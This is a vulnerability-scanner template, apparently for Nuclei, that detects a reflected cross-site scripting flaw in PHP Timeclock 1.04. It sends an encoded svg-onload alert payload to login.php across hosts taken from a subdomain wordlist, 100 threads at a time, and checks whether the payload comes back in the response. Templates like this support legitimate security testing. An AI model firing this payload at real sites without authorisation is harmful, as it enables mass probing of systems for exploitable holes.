id: php-timeclock-xss

info:
  name: PHP Timeclock 1.04 XSS
  author: pikpikcu
  severity: medium
  description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
  reference: https://www.exploit-db.com/exploits/49853
  tags: xss,php,timeclock

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E HTTP/1.1
        Host: {{Subdomains}}
        Accept-Encoding: gzip, deflate
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<svg/onload=alert`{{randstr}}`>"
          - "PHP Timeclock Admin Login"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header
